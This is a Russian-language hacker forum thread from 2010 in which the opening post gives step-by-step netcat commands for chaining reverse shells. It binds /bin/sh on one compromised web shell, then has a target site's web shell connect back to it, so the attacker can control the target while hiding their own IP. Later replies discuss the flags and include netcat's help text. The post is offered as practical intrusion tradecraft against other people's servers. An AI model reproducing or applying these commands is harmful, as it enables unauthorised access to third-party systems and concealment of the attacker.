Авторские статьи Backconnect через другой шелл

Обсуждение в разделе «Статьи», начал(-а) Pashkela, 30.04.2010.

  1. Pashkela

    Pashkela Динозавр

    Регистрация:
    10.01.2008
    Сообщения:
    2 753
    Одобрения:
    1 044
    Репутация:
    339
    Не то, чтобы статья, так, мысли вслух, подтвержденные практикой, может кому полезно будет.

    Итак известно, что бекконект с шелла делается на дедик, сейчас рассмотрим тоже самое, только в роли дедика выступит обычный веб-шел.

    Даны примерные данные, для наглядности, все испытания проводились на Ubuntu 9.10 в терминале. Итак исходные:

    1. Есть веб-шелл (наш, давнишний, "левый", может порутаный, может нет, хотим использовать) - условно ВШ1
    2. Есть веб-шелл на целевом сайте (другом, не пункт 1) - т.е. тот, что мы хотим порутать к примеру - условно ВШ2
    3. Есть терминал (локальный) - условно ТЛ
    4. И есть такая прога netcat

    Задача: сделать бекконект с ВШ2 на ВШ1 и чтобы мы могли рулить в итоге ВШ2 через терминал (ЛОКАЛЬНО) паля только IP ВШ1. Допустим ВШ1 имеет IP 84.177.33.78

    Последовательность действий:

    1. nc -l -p 31340 -nvv -e /bin/sh & - набираем в консоли ВШ1
    2. nc -nvv 84.177.33.78 31340 - набираем в ТЛ
    3. Набираем в ТЛ "uname -a" - видим данные ВШ1
    4. nc -l -p 31337 -t - набираем в ТЛ после того, как подключились к ВШ1
    5. на ВШ2 делаем бекконект любым доступным способом (хоть из встроенного функционала шелла wso, либо отдельный перл-скриптом) указывая IP ВШ1 и порт 31337
    6. 3. Набираем в ТЛ "uname -a" - видим данные ВШ2

    Всё. Мы сидим в удобном любимом домашнем терминале(с нашими красивыми настройками и etc.) и лазием по ВШ2 через ВШ1.

    PS: Ничто нам не мешает сделать цепочку таких бекконектов, лишь бы портов хватало свободных. Сорри, если где-то было и повтор
     
    #1 Pashkela, 30.04.2010
    В последний раз редактировалось: 30.04.2010
    Это одобряют 10 пользоветелей.
  2. nemaniak

    nemaniak Elder - Старейшина

    Регистрация:
    10.06.2008
    Сообщения:
    245
    Одобрения:
    162
    Репутация:
    108
    Довольно интересная статья... Сам не раз задумывался над тем как такое реализовать, никак руки не доходили до практики. Автору рескепт;)
    Также интересует параметр nvv, что он определяет?
     
  3. diehard

    diehard Elder - Старейшина

    Регистрация:
    30.09.2007
    Сообщения:
    568
    Одобрения:
    267
    Репутация:
    15
    Действительно, не поверишь, Довольно интересная статья... именно сегодня Сам не раз задумывался
    Также интересует аргумент -nvv для чего он определяет?
     
  4. BlackSun

    BlackSun Banned

    Регистрация:
    1.04.2007
    Сообщения:
    1 013
    Одобрения:
    1 167
    Репутация:
    446
    Пашке - спасибо КЭП!
    Остальным -
    Code:
    Options:
      -c, --close                close connection on EOF from stdin
      -e, --exec=PROGRAM         program to exec after connect
      -g, --gateway=LIST         source-routing hop point[s], up to 8
      -G, --pointer=NUM          source-routing pointer: 4, 8, 12, ...
      -h, --help                 display this help and exit
      -i, --interval=SECS        delay interval for lines sent, ports scanned
      -l, --listen               listen mode, for inbound connects
      -L, --tunnel=ADDRESS:PORT  forward local port to remote address
      -n, --dont-resolve         numeric-only IP addresses, no DNS
      -o, --output=FILE          output hexdump traffic to FILE (implies -x)
      -p, --local-port=NUM       local port number
      -r, --randomize            randomize local and remote ports
      -s, --source=ADDRESS       local source address (ip or hostname)
      -t, --tcp                  TCP mode (default)
      -T, --telnet               answer using TELNET negotiation
      -u, --udp                  UDP mode
      -v, --verbose              verbose (use twice to be more verbose)
      -V, --version              output version information and exit
      -x, --hexdump              hexdump incoming and outgoing traffic
      -w, --wait=SECS            timeout for connects and final net reads
      -z, --zero                 zero-I/O mode (used for scanning)
    
     
    #4 BlackSun, 1.05.2010
    В последний раз редактировалось: 1.05.2010
  5. shellz[21h]

    shellz[21h] Elder - Старейшина

    Регистрация:
    20.12.2007
    Сообщения:
    315
    Одобрения:
    68
    Репутация:
    6
    BlackSun же выложил список опций, читать не умеем?))
     
  6. life_glider

    life_glider Member

    Регистрация:
    13.04.2010
    Сообщения:
    48
    Одобрения:
    26
    Репутация:
    33
    http://forum.antichat.ru/printthread.php?t=151993
    вроде в этой статье вкратце говорится про коннект через другой хост
     
Загрузка...
Similar Threads - Backconnect другой шелл
  1. TimoMAS
    Ответы:
    1
    Просмотры:
    2 572
  2. Osstudio
    Ответы:
    166
    Просмотры:
    103 278
  3. FlooP1k
    Ответы:
    201
    Просмотры:
    134 406
  4. DeluxeS

    Авторские статьи Монетизация шеллов

    DeluxeS, 29.07.2010, в раздел: Статьи
    Ответы:
    60
    Просмотры:
    56 288
  5. zavra
    Ответы:
    6
    Просмотры:
    14 299
  6. --StraNger--

    Авторские статьи Perl – лучший друг хакера.

    --StraNger--, 21.08.2009, в раздел: Статьи
    Ответы:
    20
    Просмотры:
    7 881
  7. AFoST

    Авторские статьи Заливаем шелл через PsychoStats

    AFoST, 8.01.2008, в раздел: Статьи
    Ответы:
    28
    Просмотры:
    10 310